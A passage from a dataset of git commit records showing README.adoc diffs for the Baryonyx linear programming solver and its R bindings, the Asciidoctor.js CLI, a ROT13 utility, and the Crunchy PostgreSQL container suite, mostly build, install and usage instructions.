grid.jump=5),\n binf = bounds$min,\n bsup = bounds$max,\n scale=TRUE)\n\nsolve_lp <- function(x, file_path, limit=10000, time_limit=10, seed=123456789, thread=1) {\n r <- rbaryonyx::solve_01lp_problem(file_path = file_path,\n limit = limit,\n theta = x[\"theta\"],\n delta = x[\"delta\"],\n constraint_order = x[\"constraint_order\"],\n kappa_min = x[\"kappa_min\"],\n kappa_step = x[\"kappa_step\"],\n kappa_max = x[\"kappa_max\"],\n alpha = x[\"alpha\"],\n w = x[\"w\"],\n time_limit = time_limit,\n seed = seed,\n thread = thread,\n norm = x[\"norm\"],\n pushing_k_factor = x[\"pushing_k_factor\"],\n pushing_objective_amplifier =
x[\"pushing_objective_amplifier\"],\n pushes_limit = x[\"pushes_limit\"],\n pushing_iteration_limit = x[\"pushing_iteration_limit\"],\n init_policy = x[\"init_policy\"],\n init_random = x[\"init_random\"],\n float_type = x[\"float_type\"])\n\n return(r)\n}\n\nr = apply(morrisDesign$X, 1, solve_lp, file_path=\"verger_5_5.lp\", thread=1, limit=10000, time_limit=10, seed=123456789)\n\nmorrisDesign$Y <- r\nmu <- apply(morrisDesign$X,2,mean)\nmu.star <- apply(morrisDesign$X, 2, function(x) mean(abs(x)))\nsigma <- apply(morrisDesign$ee, 2, sd)\n\napply(morrisDesign$X, 2, function(v) plot(factor(v), r))\n----\n\nUse the RGenoud method to find the best parameter values:\n\n[source,R]\n----\nlibrary(rgenoud)\nlibrary(rbaryonyx)\nlibrary(parallel)\n\noptim_gen_lp <- function(x) {\n r <- rbaryonyx::optimize_01lp_problem(\n file_path = \"rail507pre.lp\",\n limit = -1,\n theta = x[1],\n delta = x[2],\n constraint_order = 0,\n kappa_min = x[3],\n kappa_step = x[4],\n kappa_max = 1.0,\n alpha = 1.0,\n w = 60,\n time_limit = 10,\n seed = 123654785,\n thread = 4,\n norm = 0,\n pushing_k_factor = 1,\n pushing_objective_amplifier = 10,\n pushes_limit = 20,\n pushing_iteration_limit = 50,\n init_policy = 0,\n init_random = 0.5,\n float_type = 1,\n verbose = FALSE)\n\n return(r)\n}\n\nd = matrix(c(0.0, 0.00001, 0.0, 1e-10,\n 1.0, 0.001, 0.2, 1e-4),\n nrow=4, ncol=2)\n\ns = c(0.5, 0.003226, 0.1, 1e-8)\n\nno_cores <- detectCores() - 1\ncl <- makeCluster(no_cores, outfile=\"debug.txt\")\n\nclaw1 <- genoud(optim_gen_lp, nvars=4,\n Domains=d,\n starting.values=s,\n cluster=cl,\n boundary.enforcement=1,\n max=FALSE, pop.size=10)\n----\n\n\n=== Upgrade\n\nTo upgrade to the latest version of rbaryonyx, under bash (or\nequivalent):\n\n[source,bash]\n----\ncd baryonyx\ngit pull -r <1>\ncd build\nmake -j4 <2>\nmake install\nR CMD REMOVE rbaryonyx <3>\ncd rbaryonyx\nRscript -e 'library(Rcpp); compileAttributes(\".\")'\nRscript -e 'library(devtools); devtools::document()'\ncd ..\nR CMD build rbaryonyx <4>\nR CMD INSTALL rbaryonyx_1.0.tar.gz\n----\n\n<1> Update the baryonyx and rbaryonyx from Git\n<2> Build and install baryonyx\n<3> Remove old rbaryonyx package\n<4> Build and install\n","old_contents":"= Baryonyx\nGauthier Quesnel <gauthier.quesnel@inra.fr>\nv0.5.x, 2019-??-??\n:toc:\n:homepage: https:\/\/github.com\/quesnel\/baryonyx\/\n\nhttps:\/\/en.wikipedia.org\/wiki\/Baryonyx[Baryonyx] is an integer and binary linear\nprogramming solver based on the http:\/\/www.cse.chalmers.se\/~dag\/[Dag Wedelin]\nheuristic.\n\n[width=\"15%\"]\n|============\n| https:\/\/travis-ci.org\/quesnel\/baryonyx[image:https:\/\/travis-ci.org\/quesnel\/baryonyx.png?branch=master[Build Status]] | https:\/\/ci.appveyor.com\/project\/quesnel\/baryonyx?branch=master[image:https:\/\/ci.appveyor.com\/api\/projects\/status\/github\/quesnel\/baryonyx?branch=master&svg=true[Build Status]]\n|============\n\nCopyright \u00a9 2017-2019 http:\/\/www.inra.fr\/en[INRA]\n\nThe software is released under the MIT license. 
See the LICENSE file.\n\n== Baryonyx\n\n=== Requirements and recommended\n\n* `cmake` (\u2265 3.11)\n* $$C++$$ compiler with $$C++17$$ support:\n** `gcc` \u2265 7 (https:\/\/www.gnu.org\/software\/gcc\/projects\/cxx-status.html[notes])\n** `clang` \u2265 5 (https:\/\/clang.llvm.org\/cxx_status.html[notes])\n** `visual studio 2017 15.9` with the latest patchs of 2018 (https:\/\/docs.microsoft.com\/en-us\/visualstudio\/releasenotes\/vs2017-relnotes[notes])\n\nFor recent Debian GNU\/Linux and Ubuntu derivatives (remove clang to\nonly use gcc):\n\n[source,bash]\n....\napt-get install build-essential cmake clang\n....\n\nFor Windows, install the https:\/\/www.cmake.org[CMake program] and\nVisual Studio 2017 (MSVC). You may also install the vcpkg program to\ninstall nlopt and other dependencies.\n\n* `nlopt` library - optimization library to automatic parametrization\n of the Baryonyx solver parameters.\n\n=== First installation\n\nFirst, we clone Baryonyx git repository and the submodule.\n\n....\ngit clone https:\/\/github.com\/quesnel\/baryonyx.git\ncd baryonyx\ngit submodule update --init --recursive\n....\n\nDefault, Baryonyx provides a shared library `libbaryonyx-0.4.so` (with\nhidden symbol), a static library `libbaryonyx-0.4.a` (all symbols are\npublic) and an executable `baryonyx-0.4`. To compile and install in\nthe default CMake install directory:\n\n....\ncd baryonyx\nmkdir build\ncd build\ncmake -DCMAKE_BUILD_TYPE=Release ..\nmake install\n....\n\nPrevious command line install Baryonyx program and library into the\n`\/usr\/local` prefix. If you install into another directory, you need\nto define three environment variables (into your `.bashrc` or\nequivalent). If you install into `$HOME\/usr` for example, you need to\ndefine in your `.bashrc`:\n\n....\nexport PATH=$PATH:$HOME\/usr\/bin\nexport LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$HOME\/usr\/lib\nexport PKG_CONFIG_PATH=$PKG_CONFIX_PATH:$HOME\/usr\/lib\/pkgconfig\n....\n\nThen run the following commands:\n\n....\ncd baryonyx\nmkdir build\ncd build\ncmake -DCMAKE_BUILD_TYPE=Release -DCMAKE_INSTALL_PREFIX=$HOME\/usr ..\nmake install\n....\n\nTo override the default build flags, remove the `CMAKE_BUILD_TYPE`\nparameter and override the `CXXFLAGS` as follow:\n\n....\nexport CXX=g++-8\nexport CXXFLAGS='-Wall -Wextra -Werror -ftree-vectorize -mmmx -msse -msse2 -msse3 -O3'\ncmake -DCMAKE_INSTALL_PREFIX=$HOME\/usr ..\n....\n\nThe CMake script provide parameters to control debug, log facility and\noptimization.\n\n.Table CMake Command line parameters (cmake -DWITH_LOG=OFF ...)\n[cols=\"1,1,5a\", options=\"header\"]\n|===\n|name| default| summary\n\n| WITH_LOG\n| ON\n| Enable log message on standard output.\n\n| WITH_DEBUG\n| ON\n| Enable maximum debug function and add more log message. Be careful, this mode slow down computation.\n\n| WITH_FULL_OPTIMIZATION\n| OFF\n| Enable optimal computation but remove some control on float and control.\n|===\n\n=== Update installation\n\nFirst, we need to update the Git repository with the following\ncommands:\n\n....\ncd baryonyx\ngit pull -r\ngit submodule update --recursive\n....\n\nThen go to the build directory and restart compilation and\ninstallation :\n\n....\ncd baryonyx\nmkdir build\ncd build\ncmake -DCMAKE_BUILD_TYPE=Release ..\nmake install\n....\n\n== Usage\n\n=== Solver & Optimizer\n\nTo run Baryonyx in solver mode (i.e. trying to valid all constraints):\n\n....\nbaryonyx-0.4 file.lp\n....\n\nTo run baryonyx into the heuristic model (i.e. 
trying to valid all\nconstraints and optimize the solution), add a `-o` or `--optimize`\noption to the command line:\n\n....\nbaryonyx-0.4 -o file.lp\n....\n\nTo run baryonyx into the heuristic model (i.e. trying to valid all\nconstraints and optimize the solution), add a `-o` or `--optimize`\noption to the command line:\n\n....\nbaryonyx-0.4 -o file.lp\n....\n\nThe Baryonyx solver have many parameters. Some parameters are global,\nsome specific for the optimization algorithms.\n\n.Table Command line global parameters\n[cols=\"1,1,5a\", options=\"header\"]\n|===\n|name| type| summary\n\n| --help -h\n|\n| Show help message\n\n| --quiet -q\n|\n| Remove many console output\n\n| --bench [name]\n|\n| Start benchmark. Need csv input files\n\n| --optimize -O\n|\n| Start Baryonyx in optimization mode, default is to use the solve mode\n\n| --limit -l -plimit\n| integer\n| number of loop to stop algorithm\n\n| --verbose -v\n| integer\n| verbose level from 0 (very very verbose in debug mode) to 7 (quiet)\n\n| --disable-preprocessing -np\n|\n| disable the use of preprocessing\n\n| --random\n|\n| use the pure random solver (for benchmark) instead of the Bastert\/Wedelin algorithm.\n\n| --auto[:= ]value\n| string\n| Select the type of optimizer meta-heuristic. Values are:\n\n* `none` without specific algorithm.\n* `manual` tries to update parameters to found best solution.\n* `nlopt` tries to update parameters to found best solution using nlopt library and the Nelder Mead algorithm.\n* `branch` split recursively original problem to found best solution.\n* `branch-manual` mix branch and manual algorithm.\n* `branch-nlopt` mix branch and nlopt algorithm.\n\n|===\n\nTo assign parameters to solver or optimizer algorithms, use the `-p\n[name]:value` syntax in the command line:\n\n.Table Command line parameters\n[cols=\"1,1,5a\", options=\"header\"]\n|===\n|name| type| summary\n\n| time-limit\n| real\n| time in second to stop algorithm or stop the optimize mode\n\n| limit\n| integer\n| number of loop to stop algorithm\n\n| w\n| double\n| warmup-iterator [0, 1] A percentage of `limit` loop and if w is greater than 1, the number of loop without updating kappa\n\n| theta\n| real\n| history parameters [0, 1[\n\n| delta\n| real\n| influence parameters [0, +oo[\n\n| kappa-min\n| real\n| kappa minimal value [0, kappa-max\n\n| kappa-step\n| real\n| kappa updater [0, +oo[\n\n| kappa-max\n| real\n| kappa maximal value ]kappa-min, +oo[ to stop algorithm\n\n| alpha\n| real\n| adaptiveness parameter\n\n| pushing-k-factor\n| integer\n| use to lower the kappa using the push system\n\n| pushes-limit\n| integer\n| number of push before stopping the algorithm\n\n| pushing-objective-amplifier\n| real\n| use to make r more similar to costs\n\n| pushing-iteration-limit\n| integer\n| number of loop before trying a new push\n\n| norm\n| string\n| Select the cost normalization function\n\n* `none` let unmodified costs\n* `l1` use the l1-norm function\n* `l2` use the l2-norm function\n* `random` try to avoid equal cost\n* `inf` (default): use the infinity norm\n\n| constraint-order\n| string\n| Remaining constraints order. 
Values are:\n\n* `none` (default): use the lp format constraint order\n* `reversing`: reverse the lp format constraint order\n* `random-sorting`: random the remaining constraint list\n* `infeasibility-decr`: compute infeasibility constraint in decremental order\n* `infeasibility-incr`: compute infeasibility constraint in incremental order\n* `lagrangian-decr`: sort violated constraints according to the Lagrangian multiplier values in decremental order\n* `lagrangian-incr`: sort violated constraints according to the Lagrangian multiplier values in incremental order\n* `pi-sign-change`: random the remaining constraint list if the lagrangian multipliers signs have changed\n* `cycle`: switch the constraint order after each `update_row`. Starts from `none` to `pi-sign-change`.\n\n| preprocessing\n| string\n| Constraints matrix A order. Values are:\n\n* `none`: Use the raw_problem (or lp file) order for constraints and variables.\n* `memory`: Default, use the raw_problem (or lp file) order for constraints but sort the variables to improve the memory cache efficiency.\n* `less_greater_equal`: sort constraints according to their type (first less and finally greater then equal) and sort variable to improve the memory cache efficiency.\n* `less_equal_greater`: sort constraints according to their type (first less\n and finally equal then greater) and sort variable to improve the memory cache\n efficiency.\n* `greater_less_equal`: sort constraints according to their type (first greater\n then less and finally equal) and sort variable to improve the memory cache\n efficiency.\n* `greater_equal_less`: sort constraints according to their type (first greater\n then equal and finally less) and sort variable to improve the memory cache\n efficiency.\n* `equal_less_greater`: sort constraints according to their type (first equal\n then less and finally greater) and sort variable to improve the memory cache\n efficiency.\n* `equal_greater_less`: sort constraints according to their type (first equal\n then greater and finally less) and sort variable to improve the memory cache\n efficiency.\n* `p1`: reserved\n* `p2`: reserved\n* `p3`: reserved\n* `p4`: reserved\n\n| observation\n| string\n| Select the type of observation mechanism (only in solve mode)\n\n* `none` no observation (default).\n* `pnm` produce picture files for the P matrix (one per loop) and Pi vector (Lagrangian multipliers) each loop\n* `file` produce CSV files for the P matrix (one per loop) and Pi vector (Lagrangian multipliers) each loop\n\n| floating-point_type\n| string\n| Select the type of real use internally in the solvers. Values are:\n\n* `float` float (32 bits)\n* `double` double (64 bits)\n* `longdouble` long double (84 or 128 bits)\n\n| print-level\n| integer\n| show information if greater than 0\n\n| init-policy\n| string\n| Change the initialization and reinitialization policy of the solution vector. Values are:\n\n* `bastert`: for each variable (or at `init-policy-random` rate) use cost\n values to set or unset variable.\n* `pessimistic-solve`: found a solution for each (or at `init-policy-random`\n rate) constraints. For soft constraints, affect one to strict minimum\n variables.\n* `optimistic-solve`: found a solution for each (or or `init-policy-random`\n rate) constraints. For soft constraints, affect one to the maximum variables\n that valid the constraint.\n* `cycle` (default): Only for the optimization mode, start with the\n `pessimistic-solve` mode and change to `bastert` then `pessimistic-solve`\n mode. 
The change between mode is done if and only if three times,\n optimization fails to improve the current best solution.\n\n| init-policy-random\n| real\n| [0-1] (default, 0.5) parameter of the bernoulli's law to be used in conjunction with the `init-policy` parameter. If the law returns 1, it uses the `init-policy` algorithm to initialize `X_i`, 0 means use a toss up to choose 0 or 1 according to the `init-random` value.\n\n| init-random\n| real\n| [0-1] (default, 0.5) parameter _p_ of the bernoulli's law used when 0 occurs with the `init-policy-random`.\n\n| storage-type\n| string\n| Change the solution storage policy for the optimizer mode.\n\n* `one` (default): stores only the best solution found.\n* `bound`: stores the best and the bad solution found.\n* `five`: stores the best five solution found.\n\n|===\n\nFor example:\n\n....\nbaryonyx -p limit:1000000 lib\/test\/prevl1.lp\nbaryonyx -p limit:-1 -p kappa-min:0.2 lib\/test\/prevl1.lp\n....\n\n=== Benchmark\n\nBaryonyx permits to run benchmark on a set of problems described in a `csv`\nfiles. This option is available using the `--bench [name]` option and `csv`\nfiles. All Baryonyx parameters are available to perform the benchmark.\n\nFor example:\n\n....\nbaryonyx --bench bx-0.4 -pdelta:0.01 -ptime-limit:60 spp.csv\n....\n\nThe benchmark mode updates the `csv` file with results of computation. The\n`csv` format is:\n\n....\nfile optimum status cplex lsp bx-0.2 <1>\ncplex:\nlsp: <2>\nbx-0.2:\nscp410 optimum 514 514 514 804 <3>\nscp41 optimum 429 429 429 627\nscp42 optimum 512 512 512 934\n....\n\n<1> The header: three columns mandatory (`file`, `optimum`, `status`) and one\nsolver per column. In this example, cplex, local solver and baryonyx 0.2.\n<2> The description part: one line per solver to describe version and parameter\nfor example.\n<3> Finally, one line per solve: model name (with or without extension), status\n(optimum\/feasible), best solution found and solver's solution. `inf` can be use\nto indicate no solution found.\n\nIn benchmark directory, some files are provided and a script to download\nclassical problem.\n\n== R\n\nTo use rbaryonyx, you must compile and install the baryonyx library.\nFollow the previous section and install R.\n\n=== Installation\n\nThe R rbaryonyx package requires several packages. Then, under a R terminal:\n\n....\ncd baryonyx\/rbaryonyx\nR CMD REMOVE rbaryonyx <1>\n\ninstall.packages(\"roxygen2\") <2>\ninstall.packages(\"Rcpp\")\ninstall.packages(\"devtools\")\n\nlibrary(Rcpp) <3>\ncompileAttributes(\".\")\nlibrary(devtools)\ndevtools::document()\ndevtools::build()\ndevtools::install()\n\nlibrary(rbaryonyx) <4>\n?rbaryonyx <5>\n....\n\n<1> Remove previous installed version of rbaryonyx\n<2> Install the dependencies of rbaryonyx\n<3> Build the rbaryonyx package\n<4> Load the package\n<5> The help\n\n=== API\n\nTwo functions are provided to solve or optimize 01 linear programming\nproblem. Parameters are the same as `C++ API`. 
These function returns a\nscalar:\n\n* If a solution is found:\n** if the problem is a minimization: the value of the solution found.\n** if the problem is a maximization: the inverse of the solution found.\n* If no solution is found, we use the limits of the objective function (minimal\n and maximal value possible.\n** if the problem is a minimization: the maximal value possible + the remaining\n constraints.\n** if the problem is a maximization: the inverse of the minimal value possible\n + the remaining constraints.\n* If a error occurred (not enough memory, problem error etc.):\n** if the problem is a minimization: the maximal value possible + the number of\n constraints .\n** if the problem is a maximization: the inverse of the minimal value possible\n + the number of constraints.\n\n[source,R]\n----\nsolve_01lp_problem <- function(file_path, limit = 1000L, theta = 0.5,\n delta = 1e-4, constraint_order = 0L, kappa_min = 0.1, kappa_step = 1e-4,\n kappa_max = 1.0, alpha = 1.0, w = 500L, time_limit = 10.0, seed = -1L,\n thread = 1L, norm = 4L, pushing_k_factor = 0.9,\n pushing_objective_amplifier = 5.0, pushes_limit = 10L,\n pushing_iteration_limit = 20L, init_policy = 0L, init_random = 0.5,\n float_type = 1L, verbose = TRUE)\n\noptimize_01lp_problem <- function(file_path, limit = 1000L, theta = 0.5,\n delta = 1e-4, constraint_order = 0L, kappa_min = 0.1, kappa_step = 1e-4,\n kappa_max = 1.0, alpha = 1.0, w = 500L, time_limit = 10.0, seed = -1L,\n thread = 1L, norm = 4L, pushing_k_factor = 0.9,\n pushing_objective_amplifier = 5.0, pushes_limit = 10L,\n pushing_iteration_limit = 20L, init_policy = 0L, init_random = 0.5,\n float_type = 1L, verbose = TRUE)\n----\n\n=== Usage\n\nApply morris method to found useful parameters:\n\n[source,R]\n----\nlibrary(rbaryonyx)\nlibrary(sensitivity)\n\nfactors = c(\"theta\", \"delta\", \"constraint_order\", \"kappa_min\", \"kappa_step\",\n \"kappa_max\", \"alpha\", \"w\", \"norm\", \"pushing_k_factor\",\n \"pushing_objective_amplifier\", \"pushes_limit\", \"pushing_iteration_limit\",\n \"float_type\")\n\nbounds = data.frame(\n min=c(\n 0, # theta\n 0, # delta\n 0, # constraint_order\n 0, # kappa_min\n 1e-16, # kappa_step\n 1.0, # kappa_max\n 0.0, # alpha\n 50, # w\n 0, # norm\n 0.1, # pushing_k_factor\n 1.0, # pushing_objective_amplifier\n 10, # pushes_limit\n 20, # pushing_iteration_limit\n 0, # init_policy\n 0.0, # init_random\n 0\n ), # float_type\nmax=c(\n 1, # theta\n 0, # delta\n 4, # constraint_order\n 0.1, # kappa_min\n 1e-1, # kappa_step\n 1.0, # kappa_max\n 2.0, # alpha\n 500, # w\n 4, # norm\n 1, # pushing_k_factor\n 10.0, # pushing_objective_amplifier\n 100, # pushes_limit\n 200, # pushing_iteration_limit\n 2, # init_policy\n 1.0, # init_random\n 2)) # float_type\n\nrownames(bounds) <- factors\n\nmorrisDesign <- morris(model = NULL,\n factors = factors,\n r = 10,\n design=list(type=\"oat\", levels=10, grid.jump=5),\n binf = bounds$min,\n bsup = bounds$max,\n scale=TRUE)\n\nsolve_lp <- function(x, file_path, limit=10000, time_limit=10, seed=123456789, thread=1) {\n r <- rbaryonyx::solve_01lp_problem(file_path = file_path,\n limit = limit,\n theta = x[\"theta\"],\n delta = x[\"delta\"],\n constraint_order = x[\"constraint_order\"],\n kappa_min = x[\"kappa_min\"],\n kappa_step = x[\"kappa_step\"],\n kappa_max = x[\"kappa_max\"],\n alpha = x[\"alpha\"],\n w = x[\"w\"],\n time_limit = time_limit,\n seed = seed,\n thread = thread,\n norm = x[\"norm\"],\n pushing_k_factor = x[\"pushing_k_factor\"],\n pushing_objective_amplifier = 
x[\"pushing_objective_amplifier,\"],\n pushes_limit = x[\"pushes_limit\"],\n pushing_iteration_limit = x[\"pushing_iteration_limit\"],\n init_policy = x[\"init_policy\"],\n init_random = x[\"init_random\"],\n float_type = x[\"float_type\"])\n\n return(r)\n}\n\nr = apply(morrisDesign$X, 1, solve_lp, file_path=\"verger_5_5.lp\", thread=1, limit=10000, time_limit=10, seed=123456789)\n\nmorrisDesign$Y <- r\nmu <- apply(morrisDesign$X,2,mean)\nmu.star <- apply(morrisDesign$X, 2, function(x) mean(abs(x)))\nsigma <- apply(morrisDesign$ee, 2, sd)\n\napply(morrisDesign$X, 2, function(v) plot(factor(v), r))\n----\n\nUse RGenoud method to found best paramter values:\n\n[source,R]\n----\nlibrary(rgenoud)\nlibrary(rbaryonyx)\nlibrary(parallel)\n\noptim_gen_lp <- function(x) {\n r <- rbaryonyx::optimize_01lp_problem(\n file_path = \"rail507pre.lp\",\n limit = -1,\n theta = x[1],\n delta = x[2],\n constraint_order = 0,\n kappa_min = x[3],\n kappa_step = x[4],\n kappa_max = 1.0,\n alpha = 1.0,\n w = 60,\n time_limit = 10,\n seed = 123654785,\n thread = 4,\n norm = 0,\n pushing_k_factor = 1,\n pushing_objective_amplifier = 10,\n pushes_limit = 20,\n pushing_iteration_limit = 50,\n init_policy = 0,\n init_random = 0.5,\n float_type = 1,\n verbose = FALSE)\n\n return(r)\n}\n\nd = matrix(c(0.0, 0.00001, 0.0, 1e-10,\n 1.0, 0.001, 0.2, 1e-4),\n nrow=4, ncol=2)\n\ns = c(0.5, 0.003226, 0.1, 1e-8)\n\nno_cores <- detectCores() - 1\ncl <- makeCluster(no_cores, outfile=\"debug.txt\")\n\nclaw1 <- genoud(optim_gen_lp, nvars=4,\n Domains=d,\n starting.values=s,\n cluster=cl,\n boundary.enforcement=1,\n max=FALSE, pop.size=10)\n----\n\n\n=== Upgrade\n\nTo upgrade to the latest version of rbaryonyx, under bash (or\nequivalent):\n\n[source,bash]\n----\ncd baryonyx\ngit pull -r <1>\ncd build\nmake -j4 <2>\nmake install\nR CMD REMOVE rbaryonyx <3>\ncd rbaryonyx\nRscript -e 'library(Rcpp); compileAttributes(\".\")'\nRscript -e 'library(devtools); devtools::document()'\ncd ..\nR CMD build rbaryonyx <4>\nR CMD INSTALL rbaryonyx_1.0.tar.gz\n----\n\n<1> Update the baryonyx and rbaryonyx from Git\n<2> Build and install baryonyx\n<3> Remove old rbaryonyx package\n<4> Build and install\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"ddf2793d211586b493c424c403679f375bfabaf8","subject":"Use Markdown compatible syntax","message":"Use Markdown compatible syntax\n","repos":"asciidoctor\/asciidoctor-cli.js,asciidoctor\/asciidoctor-cli.js","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Asciidoctor.js CLI\n\nifdef::env-github[]\nimage:https:\/\/img.shields.io\/travis\/asciidoctor\/asciidoctor-cli.js\/master.svg[Travis build status, link=https:\/\/travis-ci.org\/asciidoctor\/asciidoctor-cli.js]\nimage:https:\/\/img.shields.io\/npm\/v\/@asciidoctor\/cli.svg[npm version, link=https:\/\/www.npmjs.org\/package\/@asciidoctor\/cli]\nendif::[]\n\nThe Command Line Interface (CLI) for Asciidoctor.js.\n\nInstall Asciidoctor.js globally and you'll have access to the `asciidoctor` command anywhere on your system:\n\n $ npm i -g asciidoctor\n\nType `asciidoctor --help` for more information.\n","old_contents":"= Asciidoctor.js CLI\n\nifdef::env-github[]\nimage:https:\/\/img.shields.io\/travis\/asciidoctor\/asciidoctor-cli.js\/master.svg[Travis build status, link=https:\/\/travis-ci.org\/asciidoctor\/asciidoctor-cli.js]\nimage:https:\/\/img.shields.io\/npm\/v\/@asciidoctor\/cli.svg[npm version, link=https:\/\/www.npmjs.org\/package\/@asciidoctor\/cli]\nendif::[]\n\nThe Command Line Interface (CLI) for 
Asciidoctor.js.\n\nInstall Asciidoctor.js globally and you'll have access to the `asciidoctor` command anywhere on your system:\n\n $ npm i -g asciidoctor\n\nType `asciidoctor --help` for more information.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"d5544be05177ccf6ed28a106116ea84f642a109c","subject":"Update documentation.","message":"Update documentation.\n","repos":"oneonestar\/uppercaser","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Linux System Programming - Rotate by 13 places (ROT13)\nA small program that performs rotate by 13 places ``encryption''.\n\n== Compile & Run\n[source,bash]\n----\n$ git clone https:\/\/github.com\/oneonestar\/LSP_ROT13.git\n$ cd LSP_ROT13\n$ mkdir build\n$ cd build\n$ cmake ..\n$ make\n$ .\/ROT13\n----\n\n== Usage\n----\nUsage: ROT13 [OPTION...] [FILE...]\n\nROT13 -- Rotate by 13 places encryption\n\n -r, --reverse Reverse shift (right shift)\n -s, --shift=AMOUNT Shift by this AMOUNT (default 13)\n -v, --verbose Verbose Mode\n -?, --help Give this help list\n --usage Give a short usage message\n -V, --version Print program version\n\nMandatory or optional arguments to long options are also mandatory or optional\nfor any corresponding short options.\n----\nTIP: If no FILE is provided, the program will read from standard input.\n\n== Example\n[source,bash]\n----\n$ .\/ROT13 #left shift of 13, reading from stdin\n$ .\/ROT13 -s 10 #left shift of 10\n$ .\/ROT13 -r -s 8 #right shift of 8\n$ .\/ROT13 Makefile #encrypt the Makefile, output as Makefile.out\n----\n\n== Bugs & Feedback\nReport bugs to Star Poon <oneonestar@gmail.com>.\n","old_contents":"= Linux System Programming - Rotate by 13 places (ROT13)\nA small program that performs rotate by 13 places ``encryption''.\n\n== Usage\n----\nUsage: ROT13 [OPTION...] [FILE...]\nROT13 -- Rotate by 13 places encryption\n\n -r, --reverse Reverse shift (right shift).\n -s, --shift=AMOUNT Shift by this AMOUNT. (default 13)\n -?, --help Give this help list\n --usage Give a short usage message\n -V, --version Print program version\n\nMandatory or optional arguments to long options are also mandatory or optional\nfor any corresponding short options.\n\nReport bugs to Star Poon <oneonestar@gmail.com>.\n----\nTIP: If no FILE provided, program will read standard input.\n\n== Compile & Run\n[source,bash]\n----\n$ git clone https:\/\/github.com\/oneonestar\/LSP_ROT13.git\n$ cd LSP_ROT13\n$ mkdir build\n$ cmake ..\n$ make\n$ .\/ROT13\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"313f93074212b2de68e332fa2adc0cb0adc98a53","subject":"update readme - supported versions","message":"update readme - supported versions\n\nupdate the wording on the supported versions","repos":"the1forte\/crunchy-containers,CrunchyData\/crunchy-containers,CrunchyData\/crunchy-containers,CrunchyData\/crunchy-containers,the1forte\/crunchy-containers,the1forte\/crunchy-containers","old_file":"README.adoc","new_file":"README.adoc","new_contents":"== Crunchy PostgreSQL Containers\nv1.4.1, {docdate}\n\nimage::docs\/crunchy_logo.png?raw=true[]\n\n\nCrunchy Container Suite provides Docker containers that enable\nrapid deployment of PostgreSQL, including administration and\nmonitoring tools. 
Multiple styles of deploying PostgreSQL clusters\nare supported.\n\nThe containers will execute in the following environments:\n\n * Docker 1.12 and above\n * Openshift 3.4 and above\n * Kubernetes 1.5 and above\n\nThe project includes the following containers:\n\n * link:docs\/containers.adoc#crunchy-postgres[crunchy-postgres] - executes Postgres\n * link:docs\/containers.adoc#crunchy-postgres-gis[crunchy-postgres-gis] - executes Postgres plus the PostGIS extensions\n * link:docs\/containers.adoc#crunchy-backup[crunchy-backup] - performs a full database backup\n * link:docs\/containers.adoc#crunchy-pgpool[crunchy-pgpool] - executes pgpool\n * link:docs\/containers.adoc#crunchy-pgbadger[crunchy-pgbadger] - executes pgbadger\n * link:docs\/containers.adoc#crunchy-watch[crunchy-watch] - performs a form of automated failover\n * link:docs\/metrics.adoc#crunchy-collect[crunchy-collect] - collects Postgres metrics\n * link:docs\/metrics.adoc#crunchy-prometheus[crunchy-prometheus] -stores Postgres metrics\n * link:docs\/metrics.adoc#crunchy-grafana[crunchy-grafana] - graphs Postgres metrics\n * link:docs\/containers.adoc#crunchy-pgbouncer[crunchy-pgbouncer] - pgbouncer connection pooler and simple form of failover\n * link:docs\/containers.adoc#crunchy-pgadmin4[crunchy-pgadmin4] - pgadmin4 web application\n * link:docs\/containers.adoc#crunchy-dba[crunchy-dba] - implements a cron scheduler to perform simple DBA tasks\n * link:docs\/containers.adoc#crunchy-upgrade[crunchy-upgrade] - allows you to perform a major postgres upgrade using pg_upgrade\n * link:docs\/containers.adoc#crunchy-backrest-restore[crunchy-backrest-restore] - allows you to perform a pgbackrest restore\n\n\nimage::docs\/containers.png?raw=true[]\n\nFor Kubernetes users of these containers, there is an associated\nproject worth taking a look at that uses the containers found\nin this repo and provides a higher level automation.\nThat project is link:https:\/\/github.com\/crunchydata\/postgres-operator[PostgresOperator]\n\n=== Installation\n\nComplete build and install documentation is found here: link:docs\/install.adoc[Install Docs]. The provided Dockerfiles build the containers\non a Centos 7 base image and use the community PostgreSQL RPMs.\n\nCrunchy provides a commercially supported version of these containers\nbuilt upon RHEL 7 and the Crunchy supported PostgreSQL. Contact Crunchy\nfor more details at http:\/\/www.crunchydata.com.\n\n=== Examples\n\nVarious examples are provided in link:docs\/examples.adoc[the Examples documentation] for running Docker,\nKubernetes, and OpenShift environments.\n\nYou will need to set up your environment as per the link:docs\/install.adoc[Install documentation] in order to\nexecute the examples.\n","old_contents":"== Crunchy PostgreSQL Containers\nv1.4.1, {docdate}\n\nimage::docs\/crunchy_logo.png?raw=true[]\n\n\nCrunchy Container Suite provides Docker containers that enable\nrapid deployment of PostgreSQL, including administration and\nmonitoring tools. 
Multiple styles of deploying PostgreSQL clusters\nare supported.\n\nThe containers will execute in the following environments:\n\n * Docker 1.12\n * Openshift 3.5\n * Kubernetes 1.6\n\nThe project includes the following containers:\n\n * link:docs\/containers.adoc#crunchy-postgres[crunchy-postgres] - executes Postgres\n * link:docs\/containers.adoc#crunchy-postgres-gis[crunchy-postgres-gis] - executes Postgres plus the PostGIS extensions\n * link:docs\/containers.adoc#crunchy-backup[crunchy-backup] - performs a full database backup\n * link:docs\/containers.adoc#crunchy-pgpool[crunchy-pgpool] - executes pgpool\n * link:docs\/containers.adoc#crunchy-pgbadger[crunchy-pgbadger] - executes pgbadger\n * link:docs\/containers.adoc#crunchy-watch[crunchy-watch] - performs a form of automated failover\n * link:docs\/metrics.adoc#crunchy-collect[crunchy-collect] - collects Postgres metrics\n * link:docs\/metrics.adoc#crunchy-prometheus[crunchy-prometheus] -stores Postgres metrics\n * link:docs\/metrics.adoc#crunchy-grafana[crunchy-grafana] - graphs Postgres metrics\n * link:docs\/containers.adoc#crunchy-pgbouncer[crunchy-pgbouncer] - pgbouncer connection pooler and simple form of failover\n * link:docs\/containers.adoc#crunchy-pgadmin4[crunchy-pgadmin4] - pgadmin4 web application\n * link:docs\/containers.adoc#crunchy-dba[crunchy-dba] - implements a cron scheduler to perform 